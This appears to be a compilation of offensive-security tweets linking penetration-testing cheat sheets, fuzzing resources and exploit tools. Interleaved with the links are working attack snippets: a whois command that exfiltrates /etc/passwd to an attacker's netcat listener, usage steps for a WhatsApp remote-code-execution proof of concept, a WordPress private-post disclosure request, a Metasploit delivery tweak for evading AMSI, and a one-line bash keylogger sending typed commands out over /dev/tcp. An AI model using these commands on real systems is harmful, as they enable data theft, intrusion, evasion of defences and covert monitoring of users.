The Linux Forensics workshop (labs, slides, forensic images "E01")+talk done at OSDFCon 2019, is now available here: https://t.co/7aeHMNaVQI

Cheatsheet-God:-
Penetration Testing Biggest Reference Bank - OSCP / PTP & PTX Cheatsheet:-

https://t.co/mApUr4FBqW

Have limited ways to exfiltrate data? Use Whois!

attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d

victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64

Privesc - Windows batch script that finds misconfiguration issues which can lead to privilege escalation https://t.co/TQacBYeylG

[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution

1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user

https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4

A curated list of fuzzing resources ( Books, courses - free & paid, videos, tools, tutorials & vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.

https://t.co/5zu0MtfDPT

Collect all URL's, sub-domains, emails, phone numbers and fuzz all parameters for XSS/SQLi/RCE/Traversal flaws with BlackWidow https://t.co/K9EOzIpaxm https://t.co/jJzZhsfoWn

WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts

POC: GET /wordpress/?static=1&order=asc

Fix: Remove the static query property
https://t.co/dg5TSxIyKs

Analsyis: https://t.co/Wc5QY2Ui9s

One command to rule them all!

Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.

Testing and feedbacks are welcome!

https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB

Test it with:

msfconsole -r web.rc

I had fun with this one line bash keylogger today!

PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'